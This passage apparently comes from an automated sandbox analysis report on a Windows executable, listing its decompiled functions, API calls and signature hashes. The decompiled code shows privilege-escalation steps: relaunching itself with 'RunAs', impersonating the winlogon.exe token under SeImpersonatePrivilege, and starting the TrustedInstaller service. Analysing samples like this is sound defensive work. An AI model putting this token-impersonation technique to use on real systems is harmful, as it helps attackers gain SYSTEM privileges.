                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 239888749-1740548384
                                                                                                                • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                                                                0x00401c31
                                                                                                                0x00401c33
                                                                                                                0x00401c48
                                                                                                                0x00401c4f
                                                                                                                0x00401c61
                                                                                                                0x00401c68
                                                                                                                0x00401c74
                                                                                                                0x00401c79
                                                                                                                0x00401c7a
                                                                                                                0x00401c7b
                                                                                                                0x00401c84
                                                                                                                0x00401c89
                                                                                                                0x00401c8e
                                                                                                                0x00401c8f
                                                                                                                0x00401c9b
                                                                                                                0x00401ca6
                                                                                                                0x00401caf
                                                                                                                0x00401cb9
                                                                                                                0x00401cc0
                                                                                                                0x00401cc7
                                                                                                                0x00401cce
                                                                                                                0x00401cd5
                                                                                                                0x00401cdd
                                                                                                                0x00401ce0
                                                                                                                0x00401d14
                                                                                                                0x00401ce2
                                                                                                                0x00401ce8
                                                                                                                0x00401cf3
                                                                                                                0x00401cf6
                                                                                                                0x00401cfe
                                                                                                                0x00401d09
                                                                                                                0x00401d09
                                                                                                                0x00401cfe
                                                                                                                0x00401d1b

                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                • memset.MSVCRT ref: 00401C4F
                                                                                                                • memset.MSVCRT ref: 00401C68
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                • memset.MSVCRT ref: 00401C9B
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                • API String ID: 903100921-3385179869
                                                                                                                • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                0x00409924
                                                                                                                0x0040992c
                                                                                                                0x00409937
                                                                                                                0x0040993f
                                                                                                                0x0040994a
                                                                                                                0x00409956
                                                                                                                0x00409962
                                                                                                                0x0040996e
                                                                                                                0x00409971
                                                                                                                0x00409973
                                                                                                                0x00000000
                                                                                                                0x00409976
                                                                                                                0x00409977

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1529661771-70141382
                                                                                                                • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                0x00401f04
                                                                                                                0x00401f20
                                                                                                                0x00401f27
                                                                                                                0x00401f38
                                                                                                                0x00401f3f
                                                                                                                0x00401f4e
                                                                                                                0x00401f54
                                                                                                                0x00401f5f
                                                                                                                0x00401f6e
                                                                                                                0x00401f72
                                                                                                                0x00401f77
                                                                                                                0x00401f78
                                                                                                                0x00401f91
                                                                                                                0x00401f7a
                                                                                                                0x00401f88
                                                                                                                0x00401f8e
                                                                                                                0x00401f8e
                                                                                                                0x00401fa6
                                                                                                                0x00401fa9
                                                                                                                0x00401fae
                                                                                                                0x00401fb0
                                                                                                                0x00401fb2
                                                                                                                0x00401fb9
                                                                                                                0x00401fc2
                                                                                                                0x00401fca
                                                                                                                0x00401fd2
                                                                                                                0x00401fd2
                                                                                                                0x00401fd7
                                                                                                                0x00401fd7
                                                                                                                0x00401fe3

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401F27
                                                                                                                • memset.MSVCRT ref: 00401F3F
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00401F5A
                                                                                                                • wcslen.MSVCRT ref: 00401F69
                                                                                                                • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                • API String ID: 3867304300-2177360481
                                                                                                                • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                0x00401319
                                                                                                                0x0040131b
                                                                                                                0x00401327
                                                                                                                0x0040132b
                                                                                                                0x0040133a
                                                                                                                0x0040134b
                                                                                                                0x0040134b
                                                                                                                0x0040134e
                                                                                                                0x0040134e
                                                                                                                0x00401353
                                                                                                                0x0040135b

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                • String ID: TrustedInstaller
                                                                                                                • API String ID: 862991418-565535830
                                                                                                                • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                0x0040955f
                                                                                                                0x00409566
                                                                                                                0x0040956e
                                                                                                                0x00409576
                                                                                                                0x00409586
                                                                                                                0x00409586
                                                                                                                0x0040956e
                                                                                                                0x00409592
                                                                                                                0x004095aa
                                                                                                                0x00409594
                                                                                                                0x004095a3
                                                                                                                0x004095a6
                                                                                                                0x004095a6

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                                                                0x00402f3a
                                                                                                                0x00402f51
                                                                                                                0x00402f60
                                                                                                                0x00402f6f
                                                                                                                0x00402f78
                                                                                                                0x00402f7a
                                                                                                                0x00402f7a
                                                                                                                0x00402f8a
                                                                                                                0x00402f8f
                                                                                                                0x00402f94
                                                                                                                0x00402f99
                                                                                                                0x00402f9e
                                                                                                                0x00402f9f
                                                                                                                0x00402fad
                                                                                                                0x00402fb2
                                                                                                                0x00402fb2
                                                                                                                0x00402fbd
                                                                                                                0x00402fc5

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402F51
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                • wcscat.MSVCRT ref: 00402F8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: .cfg
                                                                                                                • API String ID: 776488737-3410578098
                                                                                                                • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                0x0040a348
                                                                                                                0x0040a34e
                                                                                                                0x0040a352
                                                                                                                0x0040a35f
                                                                                                                0x0040a363
                                                                                                                0x0040a369
                                                                                                                0x0040a371
                                                                                                                0x0040a374
                                                                                                                0x0040a37c
                                                                                                                0x0040a380
                                                                                                                0x0040a383
                                                                                                                0x0040a386
                                                                                                                0x0040a388
                                                                                                                0x0040a388
                                                                                                                0x0040a38c
                                                                                                                0x0040a38f
                                                                                                                0x0040a39f
                                                                                                                0x0040a3a1
                                                                                                                0x0040a3a5
                                                                                                                0x0040a3a5
                                                                                                                0x0040a3a9
                                                                                                                0x0040a3aa
                                                                                                                0x0040a3b3
                                                                                                                0x0040a3b3
                                                                                                                0x0040a37c
                                                                                                                0x0040a371
                                                                                                                0x0040a3b8
                                                                                                                0x0040a3be

                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 35%
                                                                                                                			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                0x00409ddc
                                                                                                                0x00409de4
                                                                                                                0x00409df0
                                                                                                                0x00409df5
                                                                                                                0x00409df6
                                                                                                                0x00409e03
                                                                                                                0x00409e05
                                                                                                                0x00409e06
                                                                                                                0x00409e3b
                                                                                                                0x00409e5d
                                                                                                                0x00409e6a
                                                                                                                0x00409e73
                                                                                                                0x00409e75
